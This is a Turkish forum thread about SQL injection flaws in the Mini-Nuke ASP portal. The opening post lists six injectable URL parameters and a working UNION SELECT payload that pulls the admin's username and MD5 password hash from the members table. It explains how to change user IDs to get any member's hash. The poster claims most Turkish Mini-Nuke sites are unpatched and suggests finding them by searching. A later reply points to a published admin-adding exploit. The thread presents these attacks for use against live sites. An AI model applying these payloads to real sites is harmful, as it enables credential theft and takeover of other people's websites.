folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Mini-Nuke"Lerde Sql Enjeksiyon Açığı



Mini-Nuke"Lerde Sql Enjeksiyon Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    TheOutlaw
    TheOutlaw's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    [1]
    http://[target]/members.asp?action=member_details&uid=|sql enjeksiyon|
    [2]
    http://[target]/articles.asp?action=articles&catid=|sql enjeksiyon|
    [3]
    http://[target]/hpages.asp?id=|sql enjeksiyon|
    [4]
    http://[target]/programs.asp?action=programs&catid=|sql enjeksiyon|
    [5]
    http://[target]/forum.asp?action=Topics&id=|sql enjeksiyon|
    [6]
    http://[target]/pages.asp?id=|sql enjeksiyon|


    şimdi gördüğüz gibi id='den sonraki kısımlarda istediğimiz sql enjeksiyon şeklini yapabiliyoruz... örneğin admin'in veya üyelerin md5 halindeki şifrelerini öğrenebiliriz... tabi eğer adminimiz kompleks bir şifre belirlememişse kırabiliriz md5 hash'ını:)

    http://siteadı.com/pages.asp?id=1%20union+select+0,kul_adi,sifre,0,0+ from+members+where+uye_id=1

    kodunu mini-nuke kurulu sitede denediğimizde bize id'si 1 olan yani adminin md5 halindeki şifresini verecektir...
    ayrıca id numarasını üyeler sayfasından öğrenip uye_id=1 kısmına 2,3,4 gibi üye id'leri belirtip id üzeri herhangi bir kullanıcının şifresini md5 halinde öğrenebiliriz...

    Nerde Gençliğim:(
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    olivetti
    olivetti's avatar
    Kayıt Tarihi: 22/Eylül/2005
    Erkek
    tşk kardeş ama eski

    ...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HolyDemon
    HolyDemon's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    üstat bu cok eski yaaw
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    TheOutlaw
    TheOutlaw's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    holydemon bu eski bir açık değil sanırsam çünkü şimdi bile denediğim tüm mini-nuke tabanlı siteler yedi bu sql enjeksiyonu.. istersen sen de google"dan mini-nuke die türkiye de arat.. sadece genel sitelerinin boktan yollarla kapattığını görecen.. diğerlerinin %95"i yamalanmamış halde sql enjeksiyonu bekliyor:)

    Nerde Gençliğim:(
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    exploit
    exploit's avatar
    Kayıt Tarihi: 28/Ağustos/2005
    Erkek
    peki mini nuke de hash i bile alsanız hackleyemiceinizi bilio musnuz ?

    ayrıca bayaeski ama bilinmiodu bana taaaaa ebesinin .... kadar yıl önce ejder göstermişti bunu
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    TheOutlaw
    TheOutlaw's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek
    dediğin şeyi bir yerden duydum exploit ve duyduğuma göre iki kez md5 formatına çeviriyormuş... ve sanırsam da öyle çünkü bi kaç tane denedim kırılmadı...bu sql numarası öyle bilindik bişey zaten yaw:) ama bu 1.8 lerde cokkie'ye hashı ekleyerek bişeyler yapılıyordu sanırsam..

    Nerde Gençliğim:(
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Nuker
    Nuker's avatar
    Kayıt Tarihi: 09/Ekim/2005
    Erkek
    birincisi o pages.aspdeki açığı bulan benim ve benzeri açıkların bulunduğunuda yazdım taa kaç sene önce ejder deme fasafiso konuşma milw0rmdan okuyup yazıyorlar
    diğer birşey 1.8lerde admin şifresi değişir ancak panel şifresi ayrıdır.
    Bir diğer açık ise 2.3 gibi erdi ve ekibinin devam ettirdiği mininukede sistem daha değişik direk admin ekleyen bir açıkda var onda http://www.nukedx.com/?getxpl=31 adresinden görebilirsiniz exploiti http://www.milw0rm.com/exploits/1837 buda milw0rm yansısı

    I wish you bear with me , stay near me a.k.a nukedx
Toplam Hit: 12147 Toplam Mesaj: 7